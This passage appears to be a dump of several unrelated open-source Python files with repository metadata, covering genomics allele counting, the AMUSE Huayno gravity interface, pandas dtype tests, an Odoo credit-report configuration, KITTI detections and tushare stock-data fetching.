outgroup_selections = (outgroup1_selection, outgroup2_selection, outgroup3_selection)
for variant in vcf:
alleles = [variant.REF] + variant.ALT
f1.write(f'{variant.CHROM}\t{variant.POS}\t{variant.REF}\t' + ','.join(variant.ALT) + '\t')
counter_gts_focal = Counter(convert_gts(variant.gt_bases[focal_selection]))
major_allele = counter_gts_focal.most_common()[0][0]
try:
minor_allele = counter_gts_focal.most_common()[1][0]
except IndexError:
minor_allele = list(set(alleles) - set(major_allele))[0]
f1.write(f'{major_allele}\t{minor_allele}\n')
f2.write(f"{counter_gts_focal.get('A', 0)},{counter_gts_focal.get('C', 0)},{counter_gts_focal.get('G', 0)},{counter_gts_focal.get('T', 0)}")
for selection in outgroup_selections:
counts = ['0', '0', '0', '0'] # A C G T
counter_gts = Counter(convert_gts(variant.gt_bases[selection])).most_common()
first_base, first_count = counter_gts[0]
try:
second_base, second_count = counter_gts[1]
except IndexError:
second_count = 0
                # treat the site as missing when the two outgroup alleles are tied in count
if (first_count > second_count) and (first_base != '.'):
counts[base2index[first_base]] = '1'
f2.write('\t'+','.join(counts))
f2.write('\n')
if __name__ == '__main__':
typer.run(main) | [
"[email protected]"
]
| |
80c66729e6cbcb7721e17efef2dc1381872cf87d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_minefields.py | 9a6f4d39f05827d2da9dbb885032211575fb3e49 | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py |
# class header
class _MINEFIELDS():
    def __init__(self,):
        self.name = "MINEFIELDS"
        self.definitions = ["minefield"]  # quoted: the bare name `minefield` was undefined and broke import
        self.parents = []
        self.children = []  # fixed typo: was `childen`
        self.properties = []
        self.jsondata = {}
        self.basic = ['minefield']
| [
"[email protected]"
]
| |
469e38e83b1d2afb5cf82b1f1a90849485818ff4 | fa08376603d6136ec81f958510a363192c8ced83 | /site-packages/amuse/community/huayno/interface.py | b5b2c5802b0f60328edef50762add7d292694ac4 | []
| no_license | BrianTCook/amuse_env | e8da14e0bfd917179c3973e54daab1f980ae434c | 2e7eff89e82a859020604b692fb94bdd67ed7798 | refs/heads/master | 2021-05-18T21:14:52.897911 | 2020-04-04T16:11:58 | 2020-04-04T16:11:58 | 251,420,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,952 | py | from amuse.community import *
from amuse.community.interface.gd import GravitationalDynamicsInterface, GravityFieldInterface
from amuse.community.interface.gd import GravitationalDynamics, GravityFieldCode
class HuaynoInterface(CodeInterface,
LiteratureReferencesMixIn,
GravitationalDynamicsInterface,
StoppingConditionInterface,
GravityFieldInterface):
"""
HUAYNO is a code to solve the astrophysical N-body problem. It uses
recursive Hamiltonian splitting to generate multiple-timestep integrators
which conserve momentum to machine precision. A number of different
integrators are available. The code has been developed within the
AMUSE environment. It can make use of GPUs - for this an OpenCL
version can be compiled.
    .. [#] Pelupessy, Federico I.; Jänes, Jürgen; Portegies Zwart, Simon, New Astronomy, Volume 17, Issue 8, p. 711-719
    .. [#] Jänes, Jürgen; Pelupessy, Federico I.; Portegies Zwart, Simon, A&A, Volume 570, October 2014 (for CC, OK methods)
"""
include_headers = ['worker_code.h']
__so_module__ = 'huayno_cython'
MODE_OPENCL='opencl'
MODE_OPENMP='openmp'
def name_of_worker(self,mode):
if mode==self.MODE_OPENCL:
return 'huayno_worker_cl'
if mode==self.MODE_OPENMP:
return 'huayno_worker_mp'
return 'huayno_worker'
def __init__(self, mode=None, **options):
CodeInterface.__init__(self, name_of_the_worker = self.name_of_worker(mode), **options)
LiteratureReferencesMixIn.__init__(self)
@legacy_function
def get_time():
function = LegacyFunctionSpecification()
function.addParameter('time', dtype='d', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def commit_particles():
function = LegacyFunctionSpecification()
function.result_type = 'i'
return function
@legacy_function
def get_kinetic_energy():
function = LegacyFunctionSpecification()
function.addParameter('kinetic_energy', dtype='d', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def get_potential_energy():
function = LegacyFunctionSpecification()
function.addParameter('potential_energy', dtype='d', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def initialize_code():
function = LegacyFunctionSpecification()
function.result_type = 'i'
return function
@legacy_function
def evolve_model():
function = LegacyFunctionSpecification()
function.addParameter('time_end', dtype='d', direction=function.IN)
function.result_type = 'i'
return function
@legacy_function
def get_timestep_parameter():
function = LegacyFunctionSpecification()
function.addParameter('time_param', dtype='d', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def set_timestep_parameter():
function = LegacyFunctionSpecification()
function.addParameter('time_param', dtype='d', direction=function.IN)
function.result_type = 'i'
return function
@legacy_function
def get_timestep():
function = LegacyFunctionSpecification()
function.addParameter('timestep', dtype='d', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def set_timestep():
function = LegacyFunctionSpecification()
function.addParameter('timestep', dtype='d', direction=function.IN)
function.result_type = 'i'
return function
@legacy_function
def get_verbosity_parameter():
function = LegacyFunctionSpecification()
function.addParameter('verbosity', dtype='i', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def set_verbosity_parameter():
function = LegacyFunctionSpecification()
function.addParameter('verbosity', dtype='i', direction=function.IN)
function.result_type = 'i'
return function
@legacy_function
def get_number_of_particles():
function = LegacyFunctionSpecification()
function.addParameter('number_of_particles', dtype='i', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def get_inttype_parameter():
function = LegacyFunctionSpecification()
function.addParameter('inttype', dtype='i', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def set_inttype_parameter():
function = LegacyFunctionSpecification()
function.addParameter('inttype', dtype='i', direction=function.IN)
function.result_type = 'i'
return function
@legacy_function
def get_eps2_parameter():
function = LegacyFunctionSpecification()
function.addParameter('eps2', dtype='d', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def set_eps2_parameter():
function = LegacyFunctionSpecification()
function.addParameter('eps2', dtype='d', direction=function.IN)
function.result_type = 'i'
return function
def set_eps2(self, e):
return self.set_eps2_parameter(e)
def get_eps2(self):
return self.get_eps2_parameter()
@legacy_function
def get_evolve_statistics():
function = LegacyFunctionSpecification()
function.addParameter('ttot', dtype='int64', direction=function.OUT)
function.addParameter('ktot', dtype='int64', direction=function.OUT)
function.addParameter('dtot', dtype='int64', direction=function.OUT)
function.addParameter('tstot', dtype='int64', direction=function.OUT)
function.addParameter('kstot', dtype='int64', direction=function.OUT)
function.addParameter('dstot', dtype='int64', direction=function.OUT)
function.result_type = 'i'
return function
class Huayno(GravitationalDynamics,GravityFieldCode):
__interface__ = HuaynoInterface
class inttypes(object):
# http://stackoverflow.com/questions/36932/whats-the-best-way-to-implement-an-enum-in-python
SHARED2=1
EXTRAPOLATE=5
PASS_KDK=2
PASS_DKD=7
HOLD_KDK=3
HOLD_DKD=8
PPASS_DKD=9
BRIDGE_KDK=4
BRIDGE_DKD=10
CC=11
CC_KEPLER=12
OK=13
KEPLER=14
SHARED4=15
SHARED6=18
SHARED8=19
SHARED10=20
SHAREDBS=21
CCC=22
CCC_KEPLER=23
CC_BS=24
CCC_BS=25
BS_CC_KEPLER=26
CC_BSA=27
CCC_BSA=28
SHARED2_COLLISIONS=29
SHARED4_COLLISIONS=30
SHARED6_COLLISIONS=31
SHARED8_COLLISIONS=32
SHARED10_COLLISIONS=33
@classmethod
def _list(cls):
return set([x for x in list(cls.__dict__.keys()) if not x.startswith('_')])
def __init__(self, convert_nbody = None, **options):
self.stopping_conditions = StoppingConditions(self)
legacy_interface = self.__interface__(**options)
# self.legacy_doc = legacy_interface.__doc__
GravitationalDynamics.__init__(
self,
legacy_interface,
convert_nbody,
**options
)
def define_parameters(self, handler):
self.stopping_conditions.define_parameters(handler)
handler.add_method_parameter(
"get_eps2",
"set_eps2",
"epsilon_squared",
"smoothing parameter for gravity calculations",
default_value = 0.0 | nbody_system.length * nbody_system.length
)
handler.add_method_parameter(
"get_timestep_parameter",
"set_timestep_parameter",
"timestep_parameter",
"timestep parameter for gravity calculations",
default_value = 0.03
)
handler.add_method_parameter(
"get_timestep",
"set_timestep",
"timestep",
"timestep for evolve calls",
default_value = 0.0 | nbody_system.time
)
handler.add_method_parameter(
"get_verbosity_parameter",
"set_verbosity_parameter",
"verbosity_parameter",
"verbosity parameter (0 mean silent)",
default_value = 0
)
handler.add_method_parameter(
"get_inttype_parameter",
"set_inttype_parameter",
"inttype_parameter",
"integrator method to use",
default_value = 8
)
handler.add_method_parameter(
"get_begin_time",
"set_begin_time",
"begin_time",
"model time to start the simulation at",
default_value = 0.0 | nbody_system.time
)
def define_methods(self, handler):
GravitationalDynamics.define_methods(self, handler)
handler.add_method(
"get_eps2",
(),
(nbody_system.length * nbody_system.length, handler.ERROR_CODE,)
)
handler.add_method(
"set_eps2",
(nbody_system.length * nbody_system.length, ),
(handler.ERROR_CODE,)
)
handler.add_method(
"get_timestep_parameter",
(),
(handler.NO_UNIT, handler.ERROR_CODE,)
)
handler.add_method(
"set_timestep_parameter",
(handler.NO_UNIT, ),
(handler.ERROR_CODE,)
)
handler.add_method(
"get_timestep",
(),
(nbody_system.time, handler.ERROR_CODE,)
)
handler.add_method(
"set_timestep",
(nbody_system.time, ),
(handler.ERROR_CODE,)
)
handler.add_method(
"get_inttype_parameter",
(),
(handler.NO_UNIT, handler.ERROR_CODE,)
)
handler.add_method(
"set_inttype_parameter",
(handler.NO_UNIT, ),
(handler.ERROR_CODE,)
)
self.stopping_conditions.define_methods(handler)
def define_particle_sets(self, handler):
GravitationalDynamics.define_particle_sets(self, handler)
self.stopping_conditions.define_particle_set(handler)
def define_state(self, handler):
GravitationalDynamics.define_state(self, handler)
handler.add_method('RUN', 'get_kinetic_energy')
handler.add_method('RUN', 'get_potential_energy')
self.stopping_conditions.define_state(handler)
| [
"[email protected]"
]
| |
df42fb81ab121a9776879d10e34a82753afc05d5 | 8cf5d738aa1bf604c1215bff0e57aef0218a5194 | /0x1F-pascal_triangle/0-pascal_triangle.py | 570ddb16f491d2e0ae1e2b7f26f319cb0f7f6d38 | []
| no_license | PilarPinto/holbertonschool-interview | 3493bdb41fbc437e4dcf58db99cebcc350c2029f | b58bbce825426e9a15fee67dec65768f0ae0d724 | refs/heads/master | 2023-07-13T09:28:56.071905 | 2021-08-27T03:29:44 | 2021-08-27T03:29:44 | 281,306,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | #!/usr/bin/python3
'''
Module building the lists of integers that represent Pascal's triangle
'''
def pascal_triangle(n):
    '''Return a list of the first n rows of Pascal's triangle'''
if n <= 0:
return []
pas_r = [[1]]
if n > 1:
pas_r.append([1, 1])
for ind in range(3, n + 1):
pas_r.append([1] + list(map(
lambda i: pas_r[ind - 2][i] + pas_r[ind - 2][i + 1], range(
len(pas_r[ind - 2]) - 1))) + [1])
return pas_r
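if __name__ == "__main__":
    # Illustrative self-check (not part of the original file): the first four
    # rows of Pascal's triangle.
    print(pascal_triangle(4))  # [[1], [1, 1], [1, 2, 1], [1, 3, 3, 1]]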
| [
"[email protected]"
]
| |
1b4daeedaade35bbdf704edc9591e83126e98f90 | 3805c40a5f037cb6439798f4ffc6babc5cddc004 | /dogpile/__init__.py | 345ce1cbe636b5f78423505e2638f10c3e99b39a | [
"BSD-2-Clause",
"LicenseRef-scancode-warranty-disclaimer"
]
| permissive | thestick613/dogpile.cache | ba1df3a8e71b7f22cc4b3bc52f32a7d90555b125 | a0939e132dc0964a315137787903a561f5fa5f06 | refs/heads/master | 2022-07-15T13:34:37.923493 | 2022-06-23T08:02:02 | 2022-06-23T08:02:02 | 205,935,922 | 0 | 0 | NOASSERTION | 2022-06-23T08:02:03 | 2019-09-02T21:00:39 | Python | UTF-8 | Python | false | false | 106 | py | __version__ = "0.7.2"
from .lock import Lock # noqa
from .lock import NeedRegenerationException # noqa
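# Usage note (descriptive, not from this file): Lock coordinates a single
# "creator" thread regenerating an expired value while other threads keep
# serving the stale value; the value_and_created_fn passed to Lock should
# raise NeedRegenerationException when no value exists yet.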
| [
"[email protected]"
]
| |
f10521bec9c35ed9de1f626cde80d9f4c3eccfd2 | 3b5c46ce2daa75e1e157838d0f6cfd92469471a0 | /plastering/inferencers/scrabble/ground_truth_gen.py | 06262e23e98f035aa786f957245812f56a341b1c | [
"MIT"
]
| permissive | plastering/plastering | 1b4e9c04fce4b26b22fe5ade05af9baf644b4eaa | 26ffeecb38844ebb122fde5d9bd2276a7b4150a0 | refs/heads/master | 2023-04-04T07:50:59.087529 | 2021-05-17T23:31:40 | 2021-05-17T23:31:40 | 149,086,461 | 37 | 17 | MIT | 2023-03-24T23:19:24 | 2018-09-17T07:32:17 | Python | UTF-8 | Python | false | false | 3,069 | py | import pdb
import json
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(choices=['ap_m','ebu3b', 'bml'], dest='building')
args = parser.parse_args()
import pandas as pd
from brick_parser import equipTagsetList as equip_tagsets, \
locationTagsetList as location_tagsets,\
pointSubclassDict as point_subclass_dict,\
equipSubclassDict as equip_subclass_dict,\
locationSubclassDict as location_subclass_dict
subclass_dict = dict()
subclass_dict.update(point_subclass_dict)
subclass_dict.update(equip_subclass_dict)
subclass_dict.update(location_subclass_dict)
subclass_dict['networkadapter'] = list()
subclass_dict['none'] = list()
subclass_dict['unknown'] = list()
building = args.building
sensor_df = pd.read_csv('metadata/{0}_sensor_types_location.csv'\
.format(building)).set_index('Unique Identifier')
with open('metadata/{0}_label_dict_justseparate.json'\
.format(building), 'r') as fp:
label_dict = json.load(fp)
with open('metadata/{0}_sentence_dict_justseparate.json'\
.format(building), 'r') as fp:
sentence_dict = json.load(fp)
nonpoint_tagsets = equip_tagsets + location_tagsets + ['networkadapter']
def find_nonpoint_tagsets(tagset):
if tagset.split('-')[0] in nonpoint_tagsets:
return tagset
else:
return ''
truth_dict = dict()
for srcid, label_list in label_dict.items():
sentence = sentence_dict[srcid]
phrase_list = list()
truth_list = list()
sentence_meanings = [(token,label)
for token, label
in zip(sentence, label_list)
if label not in ['none', 'unknown']]
right_identifier_buffer = ''
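    # NOTE: the left/right identifier handling below is disabled (the appends
    # are commented out), so right_identifier_buffer always stays empty and
    # the suffix append after this loop never fires.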
for (token, label) in sentence_meanings:
if label=='leftidentifier':
# phrase_list[-1] += ('-' + token)
continue
elif label=='rightidentifier':
# right_identifier_buffer += token
continue
phrase_list.append(label)
if right_identifier_buffer:
phrase_list[-1] += ('-' + right_identifier_buffer)
truth_list = [phrase
for phrase
in phrase_list
if find_nonpoint_tagsets(phrase)]
removing_tagsets = list()
for tagset in truth_list:
subclasses = subclass_dict[tagset.split('-')[0]]
        if sum(1 for t in truth_list if t in subclasses) > 1:
removing_tagsets.append(tagset)
for tagset in removing_tagsets:
truth_list = list(filter(tagset.__ne__, truth_list))
try:
truth_list.append(sensor_df['Schema Label'][srcid].replace(' ', '_'))
    except (KeyError, AttributeError):
print(srcid, 'failed')
truth_dict[srcid] = list(set(truth_list))
# TODO: add all labels to a dict (except point type info)
with open('metadata/{0}_ground_truth.json'.format(building), 'w') as fp:
json.dump(truth_dict, fp, indent=2)
| [
"[email protected]"
]
| |
12e23d45d86604712c62c27d9d5d24bbd21d6e2f | c325866c577343752f0d4394c3d96e599674df0e | /models/nosis_configuracion.py | b133bf8a84cf2a4d4f2ff5dd7f1a714f0cc0ee4e | []
| no_license | levislibra/financiera_nosis | ff11f4f8417917d48220d40c1524f91d5f1a4d24 | 3227e9258e2f8519880081232070734e929af3f8 | refs/heads/master | 2023-01-05T20:23:01.509995 | 2022-12-22T18:33:05 | 2022-12-22T18:33:05 | 236,527,122 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,340 | py | # -*- coding: utf-8 -*-
from openerp import models, fields, api
from datetime import datetime, timedelta
from dateutil import relativedelta
from openerp.exceptions import UserError, ValidationError
import time
import requests
ENDPOINT_NOSIS = 'https://ws01.nosis.com/rest/variables'
class FinancieraNosisConfiguracion(models.Model):
_name = 'financiera.nosis.configuracion'
name = fields.Char('Nombre')
usuario = fields.Char('Usuario')
token = fields.Char('Token')
id_informe = fields.Integer('Id proximo informe', default=1)
id_cuestionario = fields.Integer('Id proximo cuestionario', default=1)
ejecutar_cda_al_solicitar_informe = fields.Boolean('Ejecutar CDAs al solicitar informe')
solicitar_informe_enviar_a_revision = fields.Boolean('Solicitar informe al enviar a revision')
vr = fields.Integer('Grupo de variables')
nro_grupo_vid = fields.Integer('Grupo VID')
nro_grupo_vid2 = fields.Integer('Grupo VID 2do intento')
nosis_variable_1 = fields.Char('Variable 1')
nosis_variable_2 = fields.Char('Variable 2')
nosis_variable_3 = fields.Char('Variable 3')
nosis_variable_4 = fields.Char('Variable 4')
nosis_variable_5 = fields.Char('Variable 5')
asignar_nombre_cliente = fields.Boolean('Asignar Nombre al cliente')
asignar_nombre_cliente_variable = fields.Char('Variable para el Nombre', default='VI_RazonSocial')
asignar_direccion_cliente = fields.Boolean('Asignar Direccion al cliente')
asignar_calle_cliente_variable = fields.Char('Variable para la calle', default='VI_DomAF_Calle')
asignar_nro_cliente_variable = fields.Char('Variable para el Nro', default='VI_DomAF_Nro')
asignar_piso_cliente_variable = fields.Char('Variable para el Piso', default='VI_DomAF_Piso')
asignar_departamento_cliente_variable = fields.Char('Variable para el Departamento', default='VI_DomAF_Dto')
asignar_ciudad_cliente = fields.Boolean('Asignar Ciudad a direccion')
asignar_ciudad_cliente_variable = fields.Char('Variable para la ciudad', default='VI_DomAF_Loc')
asignar_cp_cliente = fields.Boolean('Asignar CP a direccion')
asignar_cp_cliente_variable = fields.Char('Variable para el CP', default='VI_DomAF_CP')
asignar_provincia_cliente = fields.Boolean('Asignar Provincia a direccion')
asignar_provincia_cliente_variable = fields.Char('Variable para la Provincia', default='VI_DomAF_Prov')
asignar_identificacion_cliente = fields.Boolean('Asignar identificacion al cliente')
asignar_identificacion_cliente_variable = fields.Char('Variable para la identificacion', default='VI_Identificacion')
asignar_genero_cliente = fields.Boolean('Asignar genero al cliente')
asignar_genero_cliente_variable = fields.Char('Variable para genero', default='VI_Sexo')
company_id = fields.Many2one('res.company', 'Empresa', required=False, default=lambda self: self.env['res.company']._company_default_get('financiera.nosis.configuracion'))
@api.one
def test_conexion(self):
params = {
'usuario': self.usuario,
'token': self.token,
}
response = requests.get(ENDPOINT_NOSIS, params)
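		# Nosis answers 400 (missing report parameters) when the credentials
		# themselves are accepted, so a 400 is treated as a successful
		# connectivity check; raising UserError is how this Odoo module
		# surfaces the result as a popup.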
if response.status_code == 400:
raise UserError("La cuenta esta conectada.")
else:
raise UserError("Error de conexion.")
class ExtendsResCompany(models.Model):
_name = 'res.company'
_inherit = 'res.company'
nosis_configuracion_id = fields.Many2one('financiera.nosis.configuracion', 'Configuracion Nosis')
| [
"[email protected]"
]
| |
563eba447c671fd512d395f592dacda7801a7acf | 1b9075ffea7d4b846d42981b41be44238c371202 | /2008/devel/applications/office/abiword/actions.py | e75fb6419d91ba18ae0f32bc78933b9d14e7ebfc | []
| no_license | pars-linux/contrib | bf630d4be77f4e484b8c6c8b0698a5b34b3371f4 | 908210110796ef9461a1f9b080b6171fa022e56a | refs/heads/master | 2020-05-26T20:35:58.697670 | 2011-07-11T11:16:38 | 2011-07-11T11:16:38 | 82,484,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 848 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2
# See the file http://www.gnu.org/copyleft/gpl.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
def setup():
autotools.configure("--with-x \
--with-ImageMagick \
--with-libxml2 \
--with-zlib \
--with-libpng \
--with-popt \
--enable-printing \
--enable-gnomeui")
def build():
autotools.make()
def install():
autotools.rawInstall("DESTDIR=%s" % get.installDIR())
pisitools.dodoc("docs/Abi*", "docs/NonLatin1UnixLocales.abw")
| [
"MeW@a748b760-f2fe-475f-8849-a8a11d7a3cd2"
]
| MeW@a748b760-f2fe-475f-8849-a8a11d7a3cd2 |
c805b342485e670743486773449b5dfe5ee5d797 | 5c269629ca7d5ffb3a6035d056ae88f90fd8153a | /pandas/tests/series/test_dtypes.py | 6864eac603ded8a41a02dd6bd6d298bf10d41607 | [
"BSD-3-Clause",
"LicenseRef-scancode-other-permissive",
"BSD-2-Clause"
]
| permissive | bdrosen96/pandas | 416e5cb1941b21cee38a30346056a257b7d2b0ce | 506520bd35331aa82db50686c07d96594cac0c10 | refs/heads/master | 2021-01-15T09:20:22.851970 | 2016-07-19T02:06:18 | 2016-07-19T02:06:23 | 63,601,381 | 0 | 0 | NOASSERTION | 2019-11-21T13:08:56 | 2016-07-18T12:31:49 | Python | UTF-8 | Python | false | false | 5,127 | py | # coding=utf-8
# pylint: disable-msg=E1101,W0612
import sys
from datetime import datetime
import string
from numpy import nan
import numpy as np
from pandas import Series
from pandas.tseries.index import Timestamp
from pandas.tseries.tdi import Timedelta
from pandas.compat import lrange, range, u
from pandas import compat
from pandas.util.testing import assert_series_equal
import pandas.util.testing as tm
from .common import TestData
class TestSeriesDtypes(TestData, tm.TestCase):
_multiprocess_can_split_ = True
def test_astype(self):
s = Series(np.random.randn(5), name='foo')
for dtype in ['float32', 'float64', 'int64', 'int32']:
astyped = s.astype(dtype)
self.assertEqual(astyped.dtype, dtype)
self.assertEqual(astyped.name, s.name)
def test_dtype(self):
self.assertEqual(self.ts.dtype, np.dtype('float64'))
self.assertEqual(self.ts.dtypes, np.dtype('float64'))
self.assertEqual(self.ts.ftype, 'float64:dense')
self.assertEqual(self.ts.ftypes, 'float64:dense')
assert_series_equal(self.ts.get_dtype_counts(), Series(1, ['float64']))
assert_series_equal(self.ts.get_ftype_counts(), Series(
1, ['float64:dense']))
def test_astype_cast_nan_int(self):
        s = Series([1.0, 2.0, 3.0, np.nan])
        self.assertRaises(ValueError, s.astype, np.int64)
def test_astype_cast_object_int(self):
arr = Series(["car", "house", "tree", "1"])
self.assertRaises(ValueError, arr.astype, int)
self.assertRaises(ValueError, arr.astype, np.int64)
self.assertRaises(ValueError, arr.astype, np.int8)
arr = Series(['1', '2', '3', '4'], dtype=object)
result = arr.astype(int)
self.assert_series_equal(result, Series(np.arange(1, 5)))
def test_astype_datetimes(self):
import pandas.tslib as tslib
s = Series(tslib.iNaT, dtype='M8[ns]', index=lrange(5))
s = s.astype('O')
self.assertEqual(s.dtype, np.object_)
s = Series([datetime(2001, 1, 2, 0, 0)])
s = s.astype('O')
self.assertEqual(s.dtype, np.object_)
s = Series([datetime(2001, 1, 2, 0, 0) for i in range(3)])
s[1] = np.nan
self.assertEqual(s.dtype, 'M8[ns]')
s = s.astype('O')
self.assertEqual(s.dtype, np.object_)
def test_astype_str(self):
# GH4405
digits = string.digits
s1 = Series([digits * 10, tm.rands(63), tm.rands(64), tm.rands(1000)])
s2 = Series([digits * 10, tm.rands(63), tm.rands(64), nan, 1.0])
types = (compat.text_type, np.str_)
for typ in types:
for s in (s1, s2):
res = s.astype(typ)
expec = s.map(compat.text_type)
assert_series_equal(res, expec)
# GH9757
# Test str and unicode on python 2.x and just str on python 3.x
for tt in set([str, compat.text_type]):
ts = Series([Timestamp('2010-01-04 00:00:00')])
s = ts.astype(tt)
expected = Series([tt('2010-01-04')])
assert_series_equal(s, expected)
ts = Series([Timestamp('2010-01-04 00:00:00', tz='US/Eastern')])
s = ts.astype(tt)
expected = Series([tt('2010-01-04 00:00:00-05:00')])
assert_series_equal(s, expected)
td = Series([Timedelta(1, unit='d')])
s = td.astype(tt)
expected = Series([tt('1 days 00:00:00.000000000')])
assert_series_equal(s, expected)
def test_astype_unicode(self):
# GH7758
        # a bit of magic is required to set the default encoding to utf-8
digits = string.digits
test_series = [
Series([digits * 10, tm.rands(63), tm.rands(64), tm.rands(1000)]),
Series([u('データーサイエンス、お前はもう死んでいる')]),
]
former_encoding = None
if not compat.PY3:
# in python we can force the default encoding for this test
former_encoding = sys.getdefaultencoding()
reload(sys) # noqa
sys.setdefaultencoding("utf-8")
if sys.getdefaultencoding() == "utf-8":
test_series.append(Series([u('野菜食べないとやばい')
.encode("utf-8")]))
for s in test_series:
res = s.astype("unicode")
expec = s.map(compat.text_type)
assert_series_equal(res, expec)
# restore the former encoding
if former_encoding is not None and former_encoding != "utf-8":
reload(sys) # noqa
sys.setdefaultencoding(former_encoding)
    def test_complex(self):
# GH4819
# complex access for ndarray compat
a = np.arange(5, dtype=np.float64)
b = Series(a + 4j * a)
tm.assert_numpy_array_equal(a, b.real)
tm.assert_numpy_array_equal(4 * a, b.imag)
b.real = np.arange(5) + 5
tm.assert_numpy_array_equal(a + 5, b.real)
tm.assert_numpy_array_equal(4 * a, b.imag)
| [
"[email protected]"
]
| |
f982f49bded21d3ec480ed23147785cb1e622b6f | e4007870b4d75ba23c2f12ac6646f272cf17865c | /Types/Detection_3D.py | 33c52d337085600db6cc52e4e9c38d9631902223 | [
"MIT"
]
| permissive | knut0815/PythonUtility | 385ce332ff34501be7ad21ac7948eb609770e72a | 0062e1e60dc151776b963d13bc4c1763eb90d333 | refs/heads/master | 2023-01-10T09:58:14.619531 | 2020-11-10T12:22:47 | 2020-11-10T12:22:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,453 | py | import numpy as np
from Utility.Classes.Frozen_Class import FrozenClass
class Detection3D(FrozenClass):
def __init__(self, frame, track_id, detection_type, truncation, occlusion, obs_angle, bbox, dimensions, location, rotation_y, score):
self.frame = frame
self.track_id = track_id
# detection_type: 'Car', 'Van', 'Truck', 'Pedestrian', 'Person_sitting', 'Cyclist', 'Tram', 'Misc' or 'DontCare'
self.detection_type = detection_type
# truncated: Float from 0 (non-truncated) to 1 (truncated)
self.truncation = truncation
# occluded: integer (0,1,2,3) indicating occlusion state:
# 0 = fully visible, 1 = partly occluded, 2 = largely occluded, 3 = unknown
self.occlusion = occlusion
        # observation angle of object, ranging [-pi..pi]
self.obs_angle = obs_angle
# 2D bounding box of object in the image (0-based index): contains left, top, right, bottom pixel coordinates
self.bbox = bbox
# 3D object dimensions: height, width, length (in meters)
self.dimensions = dimensions
# 3D object location x,y,z in camera coordinates (in meters)
self.location = location
# Rotation ry around Y-axis in camera coordinates [-pi..pi]
self.rotation_y = rotation_y
self.score = score
@classmethod
def from_string_list(cls, string_list):
return cls(
frame=int(float(string_list[0])), # frame
track_id=int(float(string_list[1])), # id
detection_type=string_list[2].lower(), # object type [car, pedestrian, cyclist, ...]
truncation=float(string_list[3]), # truncation [0..1]
occlusion=int(float(string_list[4])), # occlusion [0,1,2]
obs_angle=float(string_list[5]), # observation angle [rad]
bbox=np.array([float(string_list[6]), float(string_list[7]), float(string_list[8]), float(string_list[9])], dtype=float), # left [px], top [px], right [px], bottom [px]
dimensions=np.array([float(string_list[10]), float(string_list[11]), float(string_list[12])], dtype=float), # height [m], width [m], length [m]
            location=np.array([float(string_list[13]), float(string_list[14]), float(string_list[15])], dtype=float), # x, y, z [m] in camera coordinates
rotation_y=float(string_list[16]), # yaw angle [rad]
score=float(string_list[17]) if len(string_list) >= 18 else None
)
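    # Usage sketch (KITTI-style tracking label; the values are illustrative):
    #   fields = ("0 2 Car 0 0 -1.57 599.41 156.40 629.75 189.25 "
    #             "1.73 0.82 1.78 -8.15 1.75 13.86 -1.56").split()
    #   det = Detection3D.from_string_list(fields)  # det.detection_type == 'car'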
| [
"[email protected]"
]
| |
b649bb21ea563e3765210bd62d99d5b730a5b950 | 8fb2668de046fb47ffb3e0964746b400e75b7c83 | /crawl/fake_spider/tushare/kData.py | 79515c39159d08946ce04bb198cc6e7d8deaf6af | []
| no_license | reinhardtken/backtest-py | 5d8f080861851882d954f4bb944a8d374220498e | 6d14b10918c018081ab228030d2b3ac38eea267c | refs/heads/master | 2020-12-06T17:01:33.284011 | 2020-02-11T15:07:42 | 2020-02-11T15:07:42 | 232,512,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,473 | py | # -*- encoding: utf-8 -*-
# sys
import json
import datetime
# thirdpart
import pandas as pd
import tushare as ts
from pymongo import MongoClient
# this project
##########################
import util.crawl as util
import const.crawl as const
#http://tushare.org/classifying.html#id8
# code  : stock code
# name  : stock name
# date  : date
# weight: index constituent weight
def getLastK(code):
end = util.today().strftime('%Y-%m-%d')
start = util.weekAgo().strftime('%Y-%m-%d')
try:
df = ts.get_k_data(code, start=start, end=end)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKData(code, starts='2001-01-01'):
try:
df = ts.get_k_data(code, start=starts, index=False)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKDataRecent(code):
try:
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=15)
starts = starts.strftime('%Y-%m-%d')
df = ts.get_k_data(code, start=starts, index=False)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKDataNoneRecent(code):
try:
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=15)
starts = starts.strftime('%Y-%m-%d')
df = ts.get_k_data(code, start=starts, autype=None, index=False)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
